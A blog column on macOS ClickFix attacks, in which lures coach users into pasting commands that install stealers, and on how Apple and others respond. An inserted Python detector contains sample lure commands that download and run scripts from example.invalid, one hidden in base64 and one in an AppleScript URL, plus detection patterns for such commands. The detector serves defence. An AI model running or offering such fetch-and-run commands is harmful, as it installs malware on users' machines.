Last Week on My Mac: Root cause analysis and ClickFix

One of the highlights of my work as a medical practitioner was introducing adverse incident reporting and root cause analysis. Even in the most communicative and affable workplace, it’s often hard to admit that something has gone wrong and discover why. The moment outsiders become involved, it all too easily turns into a bout of blamestorming, driving truth underground.

Once you have seen how root cause analysis can pay off in one situation, you want to apply it elsewhere. So please bear with me as I dig a little deeper into what have become known, slightly inappropriately, as ClickFix attacks, which have been all the rage for the last few months.

ClickFix attacks in macOS

ClickFix attacks first emerged in Windows in early 2024, but hadn’t been reported in macOS until early December last year, when Stuart Ashenbrenner and Jonathan Semon of Huntress published a detailed account. In macOS they typically consist of three steps:

  1. The victim is lured to a site that promises to fix a real or fictitious problem for them.
  2. The hostile site coaches them to copy an opaque script and paste it into Terminal or another app that can run that script.
  3. The script then downloads and runs its malicious payload, normally a stealer. Because the user has run it themselves, it bypasses the checks macOS applies to apps downloaded in the normal way, and it proceeds to steal sensitive information from the user’s account on that Mac.

Those are illustrated by one of the early examples I stepped through in a locked-down virtual machine.

At the top of Google’s sponsored results is a solution from ChatGPT, giving its trusted web address. When I clicked on that, it took me to ChatGPT, where there’s a nice clear set of instructions, described impeccably just as you’d expect from AI. This coaches me how to open Terminal using Spotlight, very professional.

It then provides me with a command I can copy with a single click, and paste straight into Terminal. It even explains what that professes to do.

Once I have done that, scripts like .agent are installed in my Home folder, and my (virtual) Mac is now well and truly owned by its attacker.

At the end of January a variation emerged in sponsored search taking the unsuspecting to a malicious site disguised as a Medium.com blog post.

That started copying the contents of my Documents folder to “FileGrabber”, and wrote several hidden files to the top level of my Home folder, again in the safety of a locked-down VM.

Earlier this month, Jamf Threat Labs reported a similar attack abusing the applescript URL scheme to launch Script Editor and deliver another variant of the popular AMOS/SOMA stealer.
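As an added illustration, not code from this article, from Huntress, Jamf or Apple, here is a small Python triage routine covering the paste stage of the three-step chain above and the applescript URL variant that Jamf reported. It scores a pasted command for the traits these lures share (a remote fetch piped into a shell, a base64 blob decoded on the spot, hidden files written to the Home folder, a shell command wrapped in AppleScript) and, for an applescript:// link, first pulls out the script it carries. The indicator patterns, the sample commands and the URL layout assumed here (a com.apple.scripteditor host with a script query parameter) are assumptions made for this example, not detection rules from XProtect or BlockBlock.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlparse

# Indicator patterns for the "paste this into Terminal" stage. These are
# illustrative heuristics chosen for this example, not XProtect or BlockBlock rules.
INDICATORS = [
    ("remote_fetch",   re.compile(r"\b(curl|wget)\b")),
    ("pipe_to_shell",  re.compile(r"\|\s*(ba|z)?sh\b")),
    ("base64_decode",  re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("osascript",      re.compile(r"\bosascript\b|do shell script")),
    ("hidden_in_home", re.compile(r"(~|\$HOME)/\.[A-Za-z0-9_]")),
]
# A long run of base64 alphabet is what makes a pasted command "opaque gibberish".
BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")


def _decode_blob(blob: str):
    """Return the blob as text if it is valid base64 of printable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def score_command(cmd: str) -> dict:
    """Score one command string, and also look inside any base64 blob it carries."""
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    for m in BLOB.finditer(cmd):
        hits.append("opaque_blob")
        inner = _decode_blob(m.group(0))
        if inner:
            # The real fetch-and-run is usually hidden in the decoded layer.
            hits.extend("decoded:" + name for name, rx in INDICATORS if rx.search(inner))
    hits = list(dict.fromkeys(hits))  # drop duplicates, keep order
    return {"indicators": hits, "suspicious": len(hits) >= 2}


def script_from_applescript_url(url: str):
    """Extract the script carried by an applescript:// URL.

    Assumed layout (an assumption for this example):
    applescript://com.apple.scripteditor?action=new&script=<percent-encoded text>
    """
    u = urlparse(url)
    if u.scheme != "applescript":
        return None
    scripts = parse_qs(u.query).get("script")
    return scripts[0] if scripts else None


def triage(pasted: str) -> dict:
    """Triage either a pasted Terminal command or an applescript:// link."""
    script = script_from_applescript_url(pasted) if pasted.startswith("applescript:") else None
    result = score_command(script if script is not None else pasted)
    result["via_applescript_url"] = script is not None
    return result


# Constructed samples for this example; example.invalid never resolves.
SAMPLES = {
    "benign_list": "ls -la ~/Documents",
    "benign_update": "softwareupdate --list",
    "lure_base64": 'echo "%s" | base64 -D | bash'
        % base64.b64encode(b"curl -fsSL http://example.invalid/x.sh | sh").decode(),
    "lure_hidden": "mkdir -p ~/.agent && curl -s http://example.invalid/a -o ~/.agent/run "
                   "&& sh ~/.agent/run",
    "lure_applescript": "applescript://com.apple.scripteditor?action=new&script="
        + quote('do shell script "curl -fsSL http://example.invalid/p | sh"'),
}


def run_samples() -> dict:
    """Triage every sample and return the verdicts keyed by sample name."""
    return {name: triage(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{name:18} {flag:10} {', '.join(verdict['indicators'])}")
```

The point of decoding the blob before scoring is that the visible command in a ClickFix lure often contains nothing more alarming than `base64 -D | bash`; the fetch of the stealer only appears once the opaque text is unwrapped, which is exactly what the victim is coached not to look at.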

Countermeasures

In addition to Apple’s response in its weekly updates to XProtect’s detection rules, Patrick Wardle at Objective-See was quick to add a defence to his BlockBlock utility in mid-February, and Apple followed suit with an elaborate scheme added to macOS 26.4, released on 24 March. Although important, devising those defences is continuing the game of cat and mouse: no sooner are they in place than the attackers switch to a different ploy, as they have recently done by abusing a URL scheme and Script Editor. macOS offers a seemingly endless supply of mechanisms available for such abuse.

What has largely escaped attention is how bizarre user behaviour has become. Here’s a victim using a thoroughly GUI operating system copying what to them can only be incomprehensible gibberish and pasting it into Terminal, or running it in Script Editor. Why on earth would a user fall prey to that?

Prevention

Over the last few years many have grown accustomed to such strange habits as advice has drifted away from using GUI apps to relying on the command line. One factor has been the long decline in professionally written articles. For many years, my editor at MacFormat wouldn’t let me use Terminal commands in my Q&A pages unless there was no alternative. Almost all the dozens of books around me about Mac OS X rely primarily on what can be accomplished in the GUI, and are liberally illustrated with screenshots.

Over this period, tackling problems on Macs has moved from understanding how to use those GUI tools to blindly entering magic spells in Terminal, and now Script Editor. This trend has been promoted by search engines and most recently AI assistance, both of which are primarily text-based. Ask Google a Mac question, and the chances are you’ll be presented with commands to paste in, rather than a well-written account of how to solve it in the GUI.

Apple and third parties have invested in engineering solutions to problems that are fundamentally human and behavioural. Although it’s comforting to receive weekly updates to XProtect, and ingenious methods to detect potentially dangerous actions, no one has done anything about changing user behaviour. Apple seems reluctant to engage ordinary users beyond nudging them to keep macOS up to date, and no one is trying to save victims from their high risk behaviour.

This is also a common problem in healthcare, where we invest most of our resources in treatment, instead of preventing injury and disease. Although the clickfixers are unlikely to run out of victims, at least their crime could become less profitable.